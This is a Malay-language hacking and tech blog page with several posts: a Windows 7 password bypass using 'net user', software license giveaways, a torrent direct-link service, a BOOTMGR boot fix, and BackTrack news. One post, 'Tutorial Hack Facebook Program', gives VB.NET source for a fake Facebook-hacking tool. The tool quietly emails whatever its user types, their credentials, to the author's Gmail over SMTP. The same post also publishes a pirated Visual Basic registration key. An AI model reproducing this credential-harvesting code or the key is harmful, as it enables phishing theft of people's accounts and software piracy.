Home Blog Page 261

Cara Menukar Kata Laluan Windows 7 Tanpa Mengetahui Kata Laluan Semasa

0

Terdapat pelbagai kaedah untuk membolosi melepasi kata laluan Windows 7. Jika anda terlupa kata laluan, anda boleh menetapkan semula menggunakan Windows 7 DVD. Walau bagaimanapun, jika anda mempunyai akses ke mana-mana akaun Windows, maka Anda boleh menukar kata laluan tanpa mengetahui kata laluan semasa.

Cara Pertama:

Right-click pada Computer dan pilih Manage.

Pergi System Tools.

dan pilih Local Users and Groups.

Klik pada Users.

dan satu senarai akaun akan keluar dan right-click pada akaun yang kata laluannya hendak diubah. Kemudian klik pada Set Password.

Teruskan dengan butang Proceed.
Isi kata laluan baru anda dan klik OK.

Cara Kedua:

Buka CMD (Run as Administrator)

Dalam CMD anda perlu taip command seperti di bawah. (Account Name is case sensitive)

net user AccountName YourNewPassword

Kata laluan telah berjaya ditukar apabila mesej “The command completed successfully”

p/s: Sorry lama tak post dan Selamat Mencuba.

[Giveaway]App Booster Pro 2 Genuine License Key For Free

0

AppBooster Pro 2 Genuine adalah perisian yang agak terbaik..Tentu anda semua banyak install aplikasi yang agak berat dan tidak tentu arah.AppBooster memberikan anda kuasa serta merta untuk aplikasi dan permainan anda bila-bila masa sahaja anda memerlukannya…AppBooster memberhentikan semua proses latar belakang yang tidak diperlukan dan memanfaatkan lebih banyak RAM dan CPU PC anda.

AppsBooster adalah selamat dan mudah untuk digunakan,ia juga tidak mengubah apa-apa setting sistem atau mengubah suai registry anda…Sistem akan diset semula kepada status yang sama selepas Mod Booster telah di berhenti,Walaupun pengguna yang tidak berpengalaman boleh menggunakan AppBooster tanpa terhempas sesuatu atau membuat sesuatu yang salah..Bila anda mahu cuba…Tiada kelewatan, prestasi segera..

Sistem operasi:
-Operating systems Windows 7, Windows Vista, Windows XP..

Untuk mendapatkan Giveaway:
1.Pergi ke laman utama di Giveaway
2.Guna kan PCWBOOSTER sebagai promo code,masukkan email anda dan klik pada  SERIENNUMMER ANFORDERN..

                                  

 3.Apa yang perlu buat adalah check Email anda dan anda akan mendapat lesen..

4.Download di sini

P/s: Apa-apa masalah komen di bawah.

[Giveaway]G Data MobileSecurity for Android free 1 year license

0

G MobileSecurity Data adalah penyelesaian bagi anda yang sedang buntu dalam keselamatan telefon pintar anda.Ia menggunakan sistem operasi Android versi 2.0 atau lebih tinggi, lagi baik.

Bagi perlindungan dan keselamatan semasa melayari internet mudah alih dan menggunakan telefon pintar anda,Ia juga melindungi identiti anda dan peribadi sulit seperti mesej atau emel. Anda tidak perlu risau dengan terhadap virus, malware dan lain-lain program yang pengintip anda.

G MobileSecurity Data akan membantu anda menjaga telefon pintar anda sebelum orang lain tidak terhadap anda. Tunggu apa lagi? Masa untuk anda mencuba.

1. Pergi ke laman utama untuk mendapatkan lesen 1 tahun..
2. Pergi ke sini : Giveaway

P/s: Jika anda mempunyai sebarang masalah sila komen di bawah.

ZbigZ.com : Muat Turun Torrent Dengan Direct Link 2012 (Alternatif Torrific)

1

Salam.

Anda menyampah dengan fail Torrent yang ingin dimuat turun kerana jumlah seeders dan peers sangat sedikit? Anda mahukan alternatif kepada Torrific? Anda telah datang ke tempat yang betul kerana kini ZbigZ.com menawarkan perkhidmatan memuat turun Torrent melalui pautan terus (Direct Link).

Selain itu, ia menyokong pautan Magnet (Magnet Link) dan ini memudahkan kerja kita apabila tidak perlu lagi memuat turun terlebih dahulu fail metadata Torrent (.torrent).

Kelemahan yang nyata hanyalah dari segi kelajuan muat turun yang lemah/kurang/sedikit sekiranya anda memilih untuk memuat turun melalui servis percuma.

Cara Memuat Turun Torrent Melalui ZbigZ:

1.Apa yang perlu anda lakukan ialah pergi ke ZbigZ.com. Dari sini, anda boleh memilih sama ada untuk memuat naik fail metadata Torrent yang telah anda muat turun, atau salin dan tampal pautan Torrent/pautan Magnet.

2. Pautan disalin.

3. Anda cuma perlu klik pada butang GO Free! Tunggu beberapa minit (Bergantung kepada saiz fail anda) untuk dimuat turun melalui ZbigZ, dan anda akan diberikan pautan terus. Sila muat turun melalui pautan tersebut.

Screenshot Updated:

Kelajuan muat turun dari ZbigZ adalah amat memuaskan sebenarnya, tambahan lagi jika anda menggunakan jalur lebar berkelajuan tinggi seperti Unifi. Paparan skrin (Screenshot) yang anda lihat di atas ialah kelajuan internet di pejabat Mr.Hac, yang telah di-throttle oleh pihak ICT (dengki la tu dia tak pandai download movie! haha!). Kelajuan di bawah pula ialah internet di rumah Mr.Hac sendiri, Streamix pakej 1mbps, dan kelajuan muat turun dari ZbigZ boleh mencecah sehingga 130kbps++.

Mr.Hac: Gemar menonton filem Tamil, kerana filem Tamil lebih jujur berbanding filem atau drama Melayu yang kesemuanya mengampu pihak ‘tertentu’.

Forum Silent Hackers Kembali Beroperasi

0

Forum Silent Hackers Security Group (SH) kini kembali beroperasi setelah begitu lama tidak dibuka kepada pengguna/forumer. Cuma kini dengan pembinaan pengkalan data yang baru, para pengguna yang lama perlu mendaftar semula.

SH kembali dengan tampilan reka bentuk antaramuka yang baharu, sekaligus menafikan sepenuhnya dakwaan forum SH digodam, diubah tampilan (Defaced) mahupun ditutup. Ketika ia dalam peringkat pembinaan semula dahulu, blog OMG! Hackers? (Yang dahulunya dikenali sebagai My Hackers Are Here) diberi penghormatan untuk menjadi ‘muka depan’ bagi forum tersebut.

Kini anda sudah boleh mendaftar, dan terus membuat post anda yang pertama. Jangan lupa kemaskini profil serta avatar, dan buat post-post yang berguna di sana.

Anda boleh memasuk forum SH di pautan ini : Forum Silent Hackers Security Group

Bagi mereka yang masih meminati E-Book Penjelajahan Astral (Astral Projection) yang ditulis oleh Mr.Hac, anda boleh dapatkannya DI SINI.

Ia dijual pada harga RM20 dengan jumlah muka surat sebanyak 133. Nak nego? Boleh. Sila lakukan pada ruangan Hubungi Admin.

Jangan lupa juga untuk melawati blog Laga World, sebuah blog nukilan Mr.Hac akan pengalaman memelihara ikan laga. Kita jumpa lagi pada entri seterusnya.

Google Menawarkan $1 Juta Untuk Menggodam Google Chrome

0

Salam.

Berita ini telah lama dikeluarkan oleh Google, sejak dari bulan Februari lagi Google telah mewar-warkan akan tawaran kepada para penggodam diluar sana untuk menggodam/mengeksploit Google Chrome.

Ini adalah kerana sejak ia diciptakan 6 tahun yang lalu, ianya tidak pernah terjejas dari sebarang jenis eksploitasi, sedangkan Firefox, Internet Explorer dan Safari telah pun ‘ditawan’ oleh gabungan dari ramai pakar sekuriti.

Selain itu, kesemua pemenang juga akan dihadiahkan sebuah Chromebook.

Nilai hadiah wang tersebut akan diberikan mengikut kategori tertentu bermula dari $20,000, $40,000, dan $60,000, sehinggalah ia mencapai nilai $1 juta.

Anda boleh membaca berita penuh di sini : Chromium Blog

BOOTMGR is compressed. Press Ctrl+Alt+Del to restart – Apa Nak Buat?

0

Assalamu’alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Setelah selama beberapa minit memikirkan masalah yang di alami oleh laptop saudara saya ini. Akhirnya saya telah jumpa jalan penyelasaiannya dan berjaya menyelesaikannya. Apakah masalah yang saya hadapi itu?

Masalahnya ialah saya akan mendapat error apabila start laptop tersebut. Errornya ialah

BOOTMGR is compressed

Press Ctrl+Alt+Del to restart

Bila restart pun keluar error yang sama. Jadi apakah cara penyelesaiannya? Terdapat pelbagai cara. Tapi cara yang telah saya praktikkan ini mungkin cara yang paling mudah. Apa yang anda perlukan hanyalah:

  • CD atau DVD Windows (mengikut versi anda gunakan di laptop atau komputer anda)
  • Laptop yang mengalami error tersebut
  • Dan…. Pemikiran yang cerdik! Hehe.

Okay setelah anda memiliki ketiga-tiga tersebut. Seterusnya adalah anda perlu boot laptop atau komputer anda itu dengan CD atau DVD windows. Kemudian tunggu hingga sampai ke setup.

Apabila sampai ke setup, anda perlu tekan SHIFT+F10. Kemudian akan keluar command.

Di situ anda taipkan kod ini

bootrec/fixboot (kemudian tekan enter)

bootrec/fixmbr (kemudian tuliskan pula kod di sebelah ini dan tekan enter)

Setelah siap, anda restartkan balik komputer anda dan tadaaa!! Anda telah dapat boot laptop atau komputer anda tanpa ada sebarang error.

Baiklah, pasti anda tertanya-tanya, bagaimana error ni boleh berlaku? Okay. Punca error ini berlaku adalah di sebabkan anda compresskan Local Disk C anda semasa melakukan Disk Cleanup.

“Macam mana pulak aku nak tau yg aku compress disk C aku tu?”

Okay. Anda pergi ke My Computer. Kemudian tekan klik kanan pada Local Disk C anda. Selepas itu anda klik pada Properties. Di situ anda akan lihat gambar seperti ini. Warna kuning itu adalah pilihan sama ada anda ingin compresskan disk C anda ataupun tidak.

Jadi cara untuk mengelakkan perkara ini daripada berlaku, anda jangan klik pada Compress the drive to save disk space.

Ini adalah videonya bagi yang tidak faham akan apa yang saya ajar di atas.

Mungkin ada daripada anda tidak mendapat error tersebut bila compresskan disk C. Tetapi cara yang saya beri ini kepada mereka yang mengalami error tersebut. Supaya mereka tahu akan puncanya.

Sekian.

Tutorial Hack Facebook Program

0

Assalamu’alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Baiklah hari ni saya hanya ingin menunjukkan kepada anda satu video bagaimana untuk membuat sebuah program yang mungkin anda pernah guna sebelum ini untuk menggodam password rakan facebook anda. Contoh program yg mungkin anda pernah guna ialah Hack Friend AIO Tool 2011.

Ianya memang berkesan. Tetapi berkesan untuk mendapatkan password orang yg menggunakan program ini. HAHA. Ini adalah videonya.

Ini adalah source codenya:

1st code- Imports System.Net.Mail
2nd code- Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress(“Akaun Gmail anda”)
MyMailMessage.To.Add(“Akaun Email anda”)
MyMailMessage.Subject = TextBox1.Text
MyMailMessage.Body = TextBox2.Text
Dim SMTP As New SmtpClient(“smtp.gmail.com”)
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential(“Akaun Gmail anda”, “Password Gmail anda”)
SMTP.Send(MyMailMessage)
TextBox2.Text = “”
Catch ex As Exception
End Try
End Sub

Untuk membuat program ini anda memerlukan visual basic. Anda boleh memuat turunnya di sini.

Ianya adalah versi trial. Ini adalah key registration untuk menjadikannya versi penuh.

2KQT8-HV27P-GTTV9-2WBVV-M7X96

Jangan tanya soalan yang pelik-pelik. Jika anda ingin berjaya, anda perlu mencuba sehingga berjaya. Kerana apa yang telah di ajar di video itu sudah lebih mencukupi bagi anda untuk membuat sendiri program tersebut.

Sekian.

p/s:Risiko tanggung sendiri ye. Hehe.

[Software]PCWinsoft ScreenCamera For Free Registration Key

0

Esok luqman akan menduduki peperiksaan,doa-doakan lah ye..Winsoft Screen Camera perisian yang agak ringan untuk para pengguna web cam..Ia juga berfungsi untuk merakam desktop anda dengan mudah dan berkongsi skrin desktop anda..Screen Camera juga serasi dengan skype anda..

Nak tengok rupa nya:

Sistem operasi:
-Intelr 1.3GHz or faster processor
-120MB of available hard-disk space
-256MB of RAM (512MB recommended)
-MicrosoftT WindowsT 2000/XP/2003/Media Center/Vista/Windows 7
-Minimum screen resolution of 800×600

Untuk mendapatkan lesen nya:
-Anda perlu pergi ke laman ini dan register seperti biasa..
-Selepas register dia akan muncul seperti ini

-Apa yang perlu buat download dan ikut arahan yang diberi.

BackTrack 5 R2 Dilepaskan!

0

Rilisan terbaru dari sistem operasi untuk para peminat penetration testing iaitu BackTrack telah pun melepaskan versi terbaru kepada para penggunanya iaitu BackTrack 5 R2.

Untuk pilihan GNOME, 32-bit, ianya bersaiz dalam lingkungan 2.52GB, sedia untuk dimuat turun sama ada melalui pautan terus atau Torrent.

Dalam versi ini, selain penambahbaikan bugs, ia juga turut memuatkan tools tambahan yang baru sebanyak 42 tools dan menggunakan kernel 3.2.6 yang telah diubahsuai.

Antara tools baru yang telah ditambah ialah:

arduino bluelog bt-audit dirb dnschef dpscan easy-creds extundelete
findmyhash golismero goofile hashcat-gui hash-identifier hexorbase horst hotpatch
joomscan killerbee libhijack magictree nipper-ng patator pipal pyrit
reaver rebind rec-studio redfang se-toolkit sqlsus sslyze sucrack
thc-ssl-dos tlssled uniscan vega watobo wce wol-e xspy

Jika anda menggunakan BackTrack versi sebelumnya dan ingin menaik taraf tanpa melakukan pemasangan semula, sila gunakan repository berikut:

echo “deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing” >> /etc/apt/sources.list

apt-get update

apt-get dist-upgrade

Perlulah diingatkan kembali kepada para pemula diluar sana, bahawa BackTrack ialah sebuah sistem operasi Linux yang sangat lengkap. Ia bukan HANYA digunakan untuk menggodam WiFi seperti mana yang selalu diuar-uarkan di dalam blog lain. Ia adalah untuk kegunaan para profesional, yang mana skop kerjanya adalah untuk melakukan ujian penembusan dan lain-lain forensik siber.


SUMBER :
BackTrack Blog